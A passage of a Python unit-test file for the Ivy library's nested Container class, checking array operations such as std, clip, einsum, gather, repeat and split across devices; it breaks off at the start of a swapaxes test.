assert np.allclose(ivy.to_numpy(container_var['b']['c']), np.array([8 / 3]))
assert np.allclose(ivy.to_numpy(container_var.b.c), np.array([8 / 3]))
assert np.allclose(ivy.to_numpy(container_var['b']['d']), np.array([6.]))
assert np.allclose(ivy.to_numpy(container_var.b.d), np.array([6.]))
def test_container_std(dev, call):
dict_in = {'a': ivy.array([1., 2., 3.], dev=dev),
'b': {'c': ivy.array([2., 4., 6.], dev=dev), 'd': ivy.array([3., 6., 9.], dev=dev)}}
container = Container(dict_in)
container_std = container.std()
assert np.allclose(ivy.to_numpy(container_std['a']), np.array([2 / 3]) ** 0.5)
assert np.allclose(ivy.to_numpy(container_std.a), np.array([2 / 3]) ** 0.5)
assert np.allclose(ivy.to_numpy(container_std['b']['c']), np.array([8 / 3]) ** 0.5)
assert np.allclose(ivy.to_numpy(container_std.b.c), np.array([8 / 3]) ** 0.5)
assert np.allclose(ivy.to_numpy(container_std['b']['d']), np.array([6.]) ** 0.5)
assert np.allclose(ivy.to_numpy(container_std.b.d), np.array([6.]) ** 0.5)
def test_container_minimum(dev, call):
container = Container({'a': ivy.array([1., 2., 3.], dev=dev),
'b': {'c': ivy.array([2., 4., 6.], dev=dev),
'd': ivy.array([3., 6., 9.], dev=dev)}})
other = Container({'a': ivy.array([2., 3., 2.], dev=dev),
'b': {'c': ivy.array([1., 5., 4.], dev=dev),
'd': ivy.array([4., 7., 8.], dev=dev)}})
# against number
container_minimum = container.minimum(5.)
assert np.allclose(ivy.to_numpy(container_minimum['a']), np.array([1., 2., 3.]))
assert np.allclose(ivy.to_numpy(container_minimum.a), np.array([1., 2., 3.]))
assert np.allclose(ivy.to_numpy(container_minimum['b']['c']), np.array([2., 4., 5.]))
assert np.allclose(ivy.to_numpy(container_minimum.b.c), np.array([2., 4., 5.]))
assert np.allclose(ivy.to_numpy(container_minimum['b']['d']), np.array([3., 5., 5.]))
assert np.allclose(ivy.to_numpy(container_minimum.b.d), np.array([3., 5., 5.]))
# against container
container_minimum = container.minimum(other)
assert np.allclose(ivy.to_numpy(container_minimum['a']), np.array([1., 2., 2.]))
assert np.allclose(ivy.to_numpy(container_minimum.a), np.array([1., 2., 2.]))
assert np.allclose(ivy.to_numpy(container_minimum['b']['c']), np.array([1., 4., 4.]))
assert np.allclose(ivy.to_numpy(container_minimum.b.c), np.array([1., 4., 4.]))
assert np.allclose(ivy.to_numpy(container_minimum['b']['d']), np.array([3., 6., 8.]))
assert np.allclose(ivy.to_numpy(container_minimum.b.d), np.array([3., 6., 8.]))
def test_container_maximum(dev, call):
container = Container({'a': ivy.array([1., 2., 3.], dev=dev),
'b': {'c': ivy.array([2., 4., 6.], dev=dev),
'd': ivy.array([3., 6., 9.], dev=dev)}})
other = Container({'a': ivy.array([2., 3., 2.], dev=dev),
'b': {'c': ivy.array([1., 5., 4.], dev=dev),
'd': ivy.array([4., 7., 8.], dev=dev)}})
# against number
container_maximum = container.maximum(4.)
assert np.allclose(ivy.to_numpy(container_maximum['a']), np.array([4., 4., 4.]))
assert np.allclose(ivy.to_numpy(container_maximum.a), np.array([4., 4., 4.]))
assert np.allclose(ivy.to_numpy(container_maximum['b']['c']), np.array([4., 4., 6.]))
assert np.allclose(ivy.to_numpy(container_maximum.b.c), np.array([4., 4., 6.]))
assert np.allclose(ivy.to_numpy(container_maximum['b']['d']), np.array([4., 6., 9.]))
assert np.allclose(ivy.to_numpy(container_maximum.b.d), np.array([4., 6., 9.]))
# against container
container_maximum = container.maximum(other)
assert np.allclose(ivy.to_numpy(container_maximum['a']), np.array([2., 3., 3.]))
assert np.allclose(ivy.to_numpy(container_maximum.a), np.array([2., 3., 3.]))
assert np.allclose(ivy.to_numpy(container_maximum['b']['c']), np.array([2., 5., 6.]))
assert np.allclose(ivy.to_numpy(container_maximum.b.c), np.array([2., 5., 6.]))
assert np.allclose(ivy.to_numpy(container_maximum['b']['d']), np.array([4., 7., 9.]))
assert np.allclose(ivy.to_numpy(container_maximum.b.d), np.array([4., 7., 9.]))
def test_container_clip(dev, call):
container = Container({'a': ivy.array([1., 2., 3.], dev=dev),
'b': {'c': ivy.array([2., 4., 6.], dev=dev),
'd': ivy.array([3., 6., 9.], dev=dev)}})
container_min = Container({'a': ivy.array([2., 0., 0.], dev=dev),
'b': {'c': ivy.array([0., 5., 0.], dev=dev),
'd': ivy.array([4., 7., 0.], dev=dev)}})
container_max = Container({'a': ivy.array([3., 1., 2.], dev=dev),
'b': {'c': ivy.array([1., 7., 5.], dev=dev),
'd': ivy.array([5., 8., 8.], dev=dev)}})
# against number
container_clipped = container.clip(2., 6.)
assert np.allclose(ivy.to_numpy(container_clipped['a']), np.array([2., 2., 3.]))
assert np.allclose(ivy.to_numpy(container_clipped.a), np.array([2., 2., 3.]))
assert np.allclose(ivy.to_numpy(container_clipped['b']['c']), np.array([2., 4., 6.]))
assert np.allclose(ivy.to_numpy(container_clipped.b.c), np.array([2., 4., 6.]))
assert np.allclose(ivy.to_numpy(container_clipped['b']['d']), np.array([3., 6., 6.]))
assert np.allclose(ivy.to_numpy(container_clipped.b.d), np.array([3., 6., 6.]))
if call is helpers.mx_call:
# MXNet clip does not support arrays for the min and max arguments
return
# against container
container_clipped = container.clip(container_min, container_max)
assert np.allclose(ivy.to_numpy(container_clipped['a']), np.array([2., 1., 2.]))
assert np.allclose(ivy.to_numpy(container_clipped.a), np.array([2., 1., 2.]))
assert np.allclose(ivy.to_numpy(container_clipped['b']['c']), np.array([1., 5., 5.]))
assert np.allclose(ivy.to_numpy(container_clipped.b.c), np.array([1., 5., 5.]))
assert np.allclose(ivy.to_numpy(container_clipped['b']['d']), np.array([4., 7., 8.]))
assert np.allclose(ivy.to_numpy(container_clipped.b.d), np.array([4., 7., 8.]))
# def test_container_clip_vector_norm(dev, call):
# container = Container({'a': ivy.array([[0.8, 2.2], [1.5, 0.2]], dev=dev)})
# container_clipped = container.clip_vector_norm(2.5, 2.)
# assert np.allclose(ivy.to_numpy(container_clipped['a']),
# np.array([[0.71749604, 1.9731141], [1.345305, 0.17937401]]))
# assert np.allclose(ivy.to_numpy(container_clipped.a),
# np.array([[0.71749604, 1.9731141], [1.345305, 0.17937401]]))
def test_container_einsum(dev, call):
dict_in = {'a': ivy.array([[1., 2.], [3., 4.], [5., 6.]], dev=dev),
'b': {'c': ivy.array([[2., 4.], [6., 8.], [10., 12.]], dev=dev),
'd': ivy.array([[-2., -4.], [-6., -8.], [-10., -12.]], dev=dev)}}
container = Container(dict_in)
container_einsummed = container.einsum('ij->i')
assert np.allclose(ivy.to_numpy(container_einsummed['a']), np.array([3., 7., 11.]))
assert np.allclose(ivy.to_numpy(container_einsummed.a), np.array([3., 7., 11.]))
assert np.allclose(ivy.to_numpy(container_einsummed['b']['c']), np.array([6., 14., 22.]))
assert np.allclose(ivy.to_numpy(container_einsummed.b.c), np.array([6., 14., 22.]))
assert np.allclose(ivy.to_numpy(container_einsummed['b']['d']), np.array([-6., -14., -22.]))
assert np.allclose(ivy.to_numpy(container_einsummed.b.d), np.array([-6., -14., -22.]))
# def test_container_vector_norm(dev, call):
# dict_in = {'a': ivy.array([[1., 2.], [3., 4.], [5., 6.]], dev=dev),
# 'b': {'c': ivy.array([[2., 4.], [6., 8.], [10., 12.]], dev=dev),
# 'd': ivy.array([[3., 6.], [9., 12.], [15., 18.]], dev=dev)}}
# container = Container(dict_in)
# container_normed = container.vector_norm(axis=(-1, -2))
# assert np.allclose(ivy.to_numpy(container_normed['a']), 9.5394)
# assert np.allclose(ivy.to_numpy(container_normed.a), 9.5394)
# assert np.allclose(ivy.to_numpy(container_normed['b']['c']), 19.0788)
# assert np.allclose(ivy.to_numpy(container_normed.b.c), 19.0788)
# assert np.allclose(ivy.to_numpy(container_normed['b']['d']), 28.6182)
# assert np.allclose(ivy.to_numpy(container_normed.b.d), 28.6182)
def test_container_matrix_norm(dev, call):
if call is helpers.mx_call:
# MXNet does not support matrix norm
pytest.skip()
dict_in = {'a': ivy.array([[1., 2.], [3., 4.], [5., 6.]], dev=dev),
'b': {'c': ivy.array([[2., 4.], [6., 8.], [10., 12.]], dev=dev),
'd': ivy.array([[3., 6.], [9., 12.], [15., 18.]], dev=dev)}}
container = Container(dict_in)
container_normed = container.matrix_norm(axis=(-1, -2))
assert np.allclose(ivy.to_numpy(container_normed['a']), 9.52551809)
assert np.allclose(ivy.to_numpy(container_normed.a), 9.52551809)
assert np.allclose(ivy.to_numpy(container_normed['b']['c']), 19.05103618)
assert np.allclose(ivy.to_numpy(container_normed.b.c), 19.05103618)
assert np.allclose(ivy.to_numpy(container_normed['b']['d']), 28.57655427)
assert np.allclose(ivy.to_numpy(container_normed.b.d), 28.57655427)
def test_container_flip(dev, call):
dict_in = {'a': ivy.array([[1., 2.], [3., 4.], [5., 6.]], dev=dev),
'b': {'c': ivy.array([[2., 4.], [6., 8.], [10., 12.]], dev=dev),
'd': ivy.array([[-2., -4.], [-6., -8.], [-10., -12.]], dev=dev)}}
container = Container(dict_in)
container_flipped = container.flip(-1)
assert np.allclose(ivy.to_numpy(container_flipped['a']), np.array([[2., 1.], [4., 3.], [6., 5.]]))
assert np.allclose(ivy.to_numpy(container_flipped.a), np.array([[2., 1.], [4., 3.], [6., 5.]]))
assert np.allclose(ivy.to_numpy(container_flipped['b']['c']), np.array([[4., 2.], [8., 6.], [12., 10.]]))
assert np.allclose(ivy.to_numpy(container_flipped.b.c), np.array([[4., 2.], [8., 6.], [12., 10.]]))
assert np.allclose(ivy.to_numpy(container_flipped['b']['d']), np.array([[-4., -2.], [-8., -6.], [-12., -10.]]))
assert np.allclose(ivy.to_numpy(container_flipped.b.d), np.array([[-4., -2.], [-8., -6.], [-12., -10.]]))
def test_container_as_ones(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
container_ones = container.as_ones()
assert np.allclose(ivy.to_numpy(container_ones['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones['b']['c']), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones.b.c), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones['b']['d']), np.array([1]))
assert np.allclose(ivy.to_numpy(container_ones.b.d), np.array([1]))
def test_container_as_zeros(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
container_zeros = container.as_zeros()
assert np.allclose(ivy.to_numpy(container_zeros['a']), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros.a), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros['b']['c']), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros.b.c), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros['b']['d']), np.array([0]))
assert np.allclose(ivy.to_numpy(container_zeros.b.d), np.array([0]))
def test_container_as_bools(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': [], 'd': True}}
container = Container(dict_in)
container_bools = container.as_bools()
assert container_bools['a'] is True
assert container_bools.a is True
assert container_bools['b']['c'] is False
assert container_bools.b.c is False
assert container_bools['b']['d'] is True
assert container_bools.b.d is True
def test_container_all_true(dev, call):
assert not Container({'a': ivy.array([1], dev=dev), 'b': {'c': [], 'd': True}}).all_true()
assert Container({'a': ivy.array([1], dev=dev), 'b': {'c': [1], 'd': True}}).all_true()
# noinspection PyBroadException
try:
assert Container({'a': ivy.array([1], dev=dev), 'b': {'c': [1], 'd': True}}).all_true(
assert_is_bool=True)
error_raised = False
except AssertionError:
error_raised = True
assert error_raised
def test_container_all_false(dev, call):
assert Container({'a': False, 'b': {'c': [], 'd': 0}}).all_false()
assert not Container({'a': False, 'b': {'c': [1], 'd': 0}}).all_false()
# noinspection PyBroadException
try:
assert Container({'a': ivy.array([1], dev=dev), 'b': {'c': [1], 'd': True}}).all_false(
assert_is_bool=True)
error_raised = False
except AssertionError:
error_raised = True
assert error_raised
# def test_container_as_random_uniform(dev, call):
# dict_in = {'a': ivy.array([1.], dev=dev),
# 'b': {'c': ivy.array([2.], dev=dev), 'd': ivy.array([3.], dev=dev)}}
# container = Container(dict_in)
#
# container_random = container.as_random_uniform()
# assert (ivy.to_numpy(container_random['a']) != np.array([1.]))[0]
# assert (ivy.to_numpy(container_random.a) != np.array([1.]))[0]
# assert (ivy.to_numpy(container_random['b']['c']) != np.array([2.]))[0]
# assert (ivy.to_numpy(container_random.b.c) != np.array([2.]))[0]
# assert (ivy.to_numpy(container_random['b']['d']) != np.array([3.]))[0]
# assert (ivy.to_numpy(container_random.b.d) != np.array([3.]))[0]
def test_container_expand_dims(dev, call):
dict_in = {'a': ivy.array([1], dev=dev),
'b': {'c': ivy.array([2], dev=dev), 'd': ivy.array([3], dev=dev)}}
container = Container(dict_in)
# without key_chains specification
container_expanded_dims = container.expand_dims(0)
assert np.allclose(ivy.to_numpy(container_expanded_dims['a']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims['b']['c']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.c), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims['b']['d']), np.array([[3]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.d), np.array([[3]]))
# with key_chains to apply
container_expanded_dims = container.expand_dims(0, ['a', 'b/c'])
assert np.allclose(ivy.to_numpy(container_expanded_dims['a']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims['b']['c']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.c), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.d), np.array([3]))
# with key_chains to apply pruned
container_expanded_dims = container.expand_dims(0, ['a', 'b/c'], prune_unapplied=True)
assert np.allclose(ivy.to_numpy(container_expanded_dims['a']), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.a), np.array([[1]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims['b']['c']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.c), np.array([[2]]))
assert 'b/d' not in container_expanded_dims
# with key_chains to not apply
container_expanded_dims = container.expand_dims(0, Container({'a': None, 'b': {'d': None}}), to_apply=False)
assert np.allclose(ivy.to_numpy(container_expanded_dims['a']), np.array([1]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.a), np.array([1]))
assert np.allclose(ivy.to_numpy(container_expanded_dims['b']['c']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.c), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims['b']['d']), np.array([3]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.d), np.array([3]))
# with key_chains to not apply pruned
container_expanded_dims = container.expand_dims(0, Container({'a': None, 'b': {'d': None}}), to_apply=False,
prune_unapplied=True)
assert 'a' not in container_expanded_dims
assert np.allclose(ivy.to_numpy(container_expanded_dims['b']['c']), np.array([[2]]))
assert np.allclose(ivy.to_numpy(container_expanded_dims.b.c), np.array([[2]]))
assert 'b/d' not in container_expanded_dims
# def test_container_clone(dev, call):
# dict_in = {'a': ivy.array([[1], [2], [3]], dev=dev),
# 'b': {'c': ivy.array([[2], [3], [4]], dev=dev),
# 'd': ivy.array([[3], [4], [5]], dev=dev)}}
# container = Container(dict_in)
#
# # devices
# devs = list()
# dev0 = dev
# devs.append(dev0)
# if 'gpu' in dev and ivy.num_gpus() > 1:
# idx = ivy.num_gpus() - 1
# dev1 = dev[:-1] + str(idx)
# devs.append(dev1)
#
# # without key_chains specification
# container_cloned = container.dev_clone(devs)
# assert isinstance(container_cloned, ivy.DevClonedItem)
# assert min([cont.dev_str == ds for ds, cont in container_cloned.items()])
# assert ivy.Container.multi_map(
# lambda xs, _: ivy.arrays_equal(xs), [c for c in container_cloned.values()]).all_true()
# @pytest.mark.parametrize(
# "devs_as_dict", [True, False])
# def test_container_distribute(devs_as_dict, dev, call):
# array_a = ivy.array([[1], [2], [3], [4]], dev=dev)
# array_bc = ivy.array([[2], [3], [4], [5]], dev=dev)
# array_bd = ivy.array([[3], [4], [5], [6]], dev=dev)
# dict_in = {'a': array_a, 'b': {'c': array_bc, 'd': array_bd}}
# container = Container(dict_in)
# batch_size = array_a.shape[0]
#
# if call is helpers.mx_call:
# # MXNet does not support splitting along an axis with a remainder after division.
# pytest.skip()
#
# # devices
# dev0 = dev
# devs = [dev0]
# if 'gpu' in dev and ivy.num_gpus() > 1:
# idx = ivy.num_gpus() - 1
# dev1 = dev[:-1] + str(idx)
# devs.append(dev1)
# if devs_as_dict:
# devs = dict(zip(devs, [int((1/len(devs))*4)]*len(devs)))
# num_devs = len(devs)
# sub_size = int(batch_size/num_devs)
#
# # without key_chains specification
# container_dist = container.dev_dist(devs)
# assert isinstance(container_dist, ivy.DevDistItem)
# assert min([cont.dev_str == ds for ds, cont in container_dist.items()])
# for i, sub_cont in enumerate(container_dist.values()):
# assert np.array_equal(ivy.to_numpy(sub_cont.a), ivy.to_numpy(array_a)[i*sub_size:i*sub_size+sub_size])
# assert np.array_equal(ivy.to_numpy(sub_cont.b.c), ivy.to_numpy(array_bc)[i*sub_size:i*sub_size+sub_size])
# assert np.array_equal(ivy.to_numpy(sub_cont.b.d), ivy.to_numpy(array_bd)[i*sub_size:i*sub_size+sub_size])
def test_container_unstack(dev, call):
dict_in = {'a': ivy.array([[1], [2], [3]], dev=dev),
'b': {'c': ivy.array([[2], [3], [4]], dev=dev),
'd': ivy.array([[3], [4], [5]], dev=dev)}}
container = Container(dict_in)
# without key_chains specification
container_unstacked = container.unstack(0)
for cont, a, bc, bd in zip(container_unstacked, [1, 2, 3], [2, 3, 4], [3, 4, 5]):
assert np.array_equal(ivy.to_numpy(cont['a']), np.array([a]))
assert np.array_equal(ivy.to_numpy(cont.a), np.array([a]))
assert np.array_equal(ivy.to_numpy(cont['b']['c']), np.array([bc]))
assert np.array_equal(ivy.to_numpy(cont.b.c), np.array([bc]))
assert np.array_equal(ivy.to_numpy(cont['b']['d']), np.array([bd]))
assert np.array_equal(ivy.to_numpy(cont.b.d), np.array([bd]))
def test_container_split(dev, call):
dict_in = {'a': ivy.array([[1], [2], [3]], dev=dev),
'b': {'c': ivy.array([[2], [3], [4]], dev=dev),
'd': ivy.array([[3], [4], [5]], dev=dev)}}
container = Container(dict_in)
# without key_chains specification
container_split = container.split(1, -1)
for cont, a, bc, bd in zip(container_split, [1, 2, 3], [2, 3, 4], [3, 4, 5]):
assert np.array_equal(ivy.to_numpy(cont['a'])[0], np.array([a]))
assert np.array_equal(ivy.to_numpy(cont.a)[0], np.array([a]))
assert np.array_equal(ivy.to_numpy(cont['b']['c'])[0], np.array([bc]))
assert np.array_equal(ivy.to_numpy(cont.b.c)[0], np.array([bc]))
assert np.array_equal(ivy.to_numpy(cont['b']['d'])[0], np.array([bd]))
assert np.array_equal(ivy.to_numpy(cont.b.d)[0], np.array([bd]))
def test_container_gather(dev, call):
dict_in = {'a': ivy.array([1, 2, 3, 4, 5, 6], dev=dev),
'b': {'c': ivy.array([2, 3, 4, 5], dev=dev), 'd': ivy.array([10, 9, 8, 7, 6], dev=dev)}}
container = Container(dict_in)
# without key_chains specification
container_gathered = container.gather(ivy.array([1, 3], dev=dev))
assert np.allclose(ivy.to_numpy(container_gathered['a']), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['c']), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['d']), np.array([9, 7]))
assert np.allclose(ivy.to_numpy(container_gathered.b.d), np.array([9, 7]))
# with key_chains to apply
container_gathered = container.gather(ivy.array([1, 3], dev=dev), -1, ['a', 'b/c'])
assert np.allclose(ivy.to_numpy(container_gathered['a']), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['c']), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['d']), np.array([10, 9, 8, 7, 6]))
assert np.allclose(ivy.to_numpy(container_gathered.b.d), np.array([10, 9, 8, 7, 6]))
# with key_chains to apply pruned
container_gathered = container.gather(ivy.array([1, 3], dev=dev), -1, ['a', 'b/c'], prune_unapplied=True)
assert np.allclose(ivy.to_numpy(container_gathered['a']), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([2, 4]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['c']), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert 'b/d' not in container_gathered
# with key_chains to not apply
container_gathered = container.gather(ivy.array([1, 3], dev=dev), -1,
Container({'a': None, 'b': {'d': None}}),
to_apply=False)
assert np.allclose(ivy.to_numpy(container_gathered['a']), np.array([1, 2, 3, 4, 5, 6]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([1, 2, 3, 4, 5, 6]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['c']), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['d']), np.array([10, 9, 8, 7, 6]))
assert np.allclose(ivy.to_numpy(container_gathered.b.d), np.array([10, 9, 8, 7, 6]))
# with key_chains to not apply pruned
container_gathered = container.gather(ivy.array([1, 3], dev=dev), -1,
Container({'a': None, 'b': {'d': None}}),
to_apply=False, prune_unapplied=True)
assert 'a' not in container_gathered
assert np.allclose(ivy.to_numpy(container_gathered['b']['c']), np.array([3, 5]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([3, 5]))
assert 'b/d' not in container_gathered
def test_container_gather_nd(dev, call):
dict_in = {'a': ivy.array([[[1, 2], [3, 4]],
[[5, 6], [7, 8]]], dev=dev),
'b': {'c': ivy.array([[[8, 7], [6, 5]],
[[4, 3], [2, 1]]], dev=dev),
'd': ivy.array([[[2, 4], [6, 8]],
[[10, 12], [14, 16]]], dev=dev)}}
container = Container(dict_in)
# without key_chains specification
container_gathered = container.gather_nd(ivy.array([[0, 1], [1, 0]], dev=dev))
assert np.allclose(ivy.to_numpy(container_gathered['a']), np.array([[3, 4], [5, 6]]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([[3, 4], [5, 6]]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['c']), np.array([[6, 5], [4, 3]]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['d']), np.array([[6, 8], [10, 12]]))
assert np.allclose(ivy.to_numpy(container_gathered.b.d), np.array([[6, 8], [10, 12]]))
# with key_chains to apply
container_gathered = container.gather_nd(ivy.array([[0, 1], [1, 0]], dev=dev), ['a', 'b/c'])
assert np.allclose(ivy.to_numpy(container_gathered['a']), np.array([[3, 4], [5, 6]]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([[3, 4], [5, 6]]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['c']), np.array([[6, 5], [4, 3]]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['d']), np.array([[[2, 4], [6, 8]],
[[10, 12], [14, 16]]]))
assert np.allclose(ivy.to_numpy(container_gathered.b.d), np.array([[[2, 4], [6, 8]],
[[10, 12], [14, 16]]]))
# with key_chains to apply pruned
container_gathered = container.gather_nd(ivy.array([[0, 1], [1, 0]], dev=dev), ['a', 'b/c'],
prune_unapplied=True)
assert np.allclose(ivy.to_numpy(container_gathered['a']), np.array([[3, 4], [5, 6]]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([[3, 4], [5, 6]]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['c']), np.array([[6, 5], [4, 3]]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert 'b/d' not in container_gathered
# with key_chains to not apply
container_gathered = container.gather_nd(ivy.array([[0, 1], [1, 0]], dev=dev),
Container({'a': None, 'b': {'d': None}}),
to_apply=False)
assert np.allclose(ivy.to_numpy(container_gathered['a']), np.array([[[1, 2], [3, 4]],
[[5, 6], [7, 8]]]))
assert np.allclose(ivy.to_numpy(container_gathered.a), np.array([[[1, 2], [3, 4]],
[[5, 6], [7, 8]]]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['c']), np.array([[6, 5], [4, 3]]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert np.allclose(ivy.to_numpy(container_gathered['b']['d']), np.array([[[2, 4], [6, 8]],
[[10, 12], [14, 16]]]))
assert np.allclose(ivy.to_numpy(container_gathered.b.d), np.array([[[2, 4], [6, 8]],
[[10, 12], [14, 16]]]))
# with key_chains to not apply pruned
container_gathered = container.gather_nd(ivy.array([[0, 1], [1, 0]], dev=dev),
Container({'a': None, 'b': {'d': None}}),
to_apply=False, prune_unapplied=True)
assert 'a' not in container_gathered
assert np.allclose(ivy.to_numpy(container_gathered['b']['c']), np.array([[6, 5], [4, 3]]))
assert np.allclose(ivy.to_numpy(container_gathered.b.c), np.array([[6, 5], [4, 3]]))
assert 'b/d' not in container_gathered
def test_container_repeat(dev, call):
if call is helpers.mx_call:
# MXNet does not support repeats specified as array
pytest.skip()
dict_in = {'a': ivy.array([[0., 1., 2., 3.]], dev=dev),
'b': {'c': ivy.array([[5., 10., 15., 20.]], dev=dev),
'd': ivy.array([[10., 9., 8., 7.]], dev=dev)}}
container = Container(dict_in)
# without key_chains specification
container_repeated = container.repeat(ivy.array([2, 1, 0, 3], dev=dev), -1)
assert np.allclose(ivy.to_numpy(container_repeated['a']), np.array([[0., 0., 1., 3., 3., 3.]]))
assert np.allclose(ivy.to_numpy(container_repeated.a), np.array([[0., 0., 1., 3., 3., 3.]]))
assert np.allclose(ivy.to_numpy(container_repeated['b']['c']), np.array([[5., 5., 10., 20., 20., 20.]]))
assert np.allclose(ivy.to_numpy(container_repeated.b.c), np.array([[5., 5., 10., 20., 20., 20.]]))
assert np.allclose(ivy.to_numpy(container_repeated['b']['d']), np.array([[10., 10., 9., 7., 7., 7.]]))
assert np.allclose(ivy.to_numpy(container_repeated.b.d), np.array([[10., 10., 9., 7., 7., 7.]]))
# with key_chains to apply
container_repeated = container.repeat(ivy.array([2, 1, 0, 3], dev=dev), -1, ['a', 'b/c'])
assert np.allclose(ivy.to_numpy(container_repeated['a']), np.array([[0., 0., 1., 3., 3., 3.]]))
assert np.allclose(ivy.to_numpy(container_repeated.a), np.array([[0., 0., 1., 3., 3., 3.]]))
assert np.allclose(ivy.to_numpy(container_repeated['b']['c']), np.array([[5., 5., 10., 20., 20., 20.]]))
assert np.allclose(ivy.to_numpy(container_repeated.b.c), np.array([[5., 5., 10., 20., 20., 20.]]))
assert np.allclose(ivy.to_numpy(container_repeated['b']['d']), np.array([[10., 9., 8., 7.]]))
assert np.allclose(ivy.to_numpy(container_repeated.b.d), np.array([[10., 9., 8., 7.]]))
# with key_chains to apply pruned
container_repeated = container.repeat(ivy.array([2, 1, 0, 3], dev=dev), -1, ['a', 'b/c'],
prune_unapplied=True)
assert np.allclose(ivy.to_numpy(container_repeated['a']), np.array([[0., 0., 1., 3., 3., 3.]]))
assert np.allclose(ivy.to_numpy(container_repeated.a), np.array([[0., 0., 1., 3., 3., 3.]]))
assert np.allclose(ivy.to_numpy(container_repeated['b']['c']), np.array([[5., 5., 10., 20., 20., 20.]]))
assert np.allclose(ivy.to_numpy(container_repeated.b.c), np.array([[5., 5., 10., 20., 20., 20.]]))
assert 'b/d' not in container_repeated
# with key_chains to not apply
container_repeated = container.repeat(ivy.array([2, 1, 0, 3], dev=dev), -1,
Container({'a': None, 'b': {'d': None}}),
to_apply=False)
assert np.allclose(ivy.to_numpy(container_repeated['a']), np.array([[0., 1., 2., 3.]]))
assert np.allclose(ivy.to_numpy(container_repeated.a), np.array([[0., 1., 2., 3.]]))
assert np.allclose(ivy.to_numpy(container_repeated['b']['c']), np.array([[5., 5., 10., 20., 20., 20.]]))
assert np.allclose(ivy.to_numpy(container_repeated.b.c), np.array([[5., 5., 10., 20., 20., 20.]]))
assert np.allclose(ivy.to_numpy(container_repeated['b']['d']), np.array([[10., 9., 8., 7.]]))
assert np.allclose(ivy.to_numpy(container_repeated.b.d), np.array([[10., 9., 8., 7.]]))
# with key_chains to not apply pruned
container_repeated = container.repeat(ivy.array([2, 1, 0, 3], dev=dev), -1,
Container({'a': None, 'b': {'d': None}}),
to_apply=False, prune_unapplied=True)
assert 'a' not in container_repeated
assert np.allclose(ivy.to_numpy(container_repeated['b']['c']), np.array([[5., 5., 10., 20., 20., 20.]]))
assert np.allclose(ivy.to_numpy(container_repeated.b.c), np.array([[5., 5., 10., 20., 20., 20.]]))
assert 'b/d' not in container_repeated
def test_container_swapaxes(dev, call):
if call is helpers.mx_call:
# MXNet does not support repeats specified as array
pytest.skip()
dict_in = {'a': ivy.array([[0., 1., 2., 3.]], dev=dev),
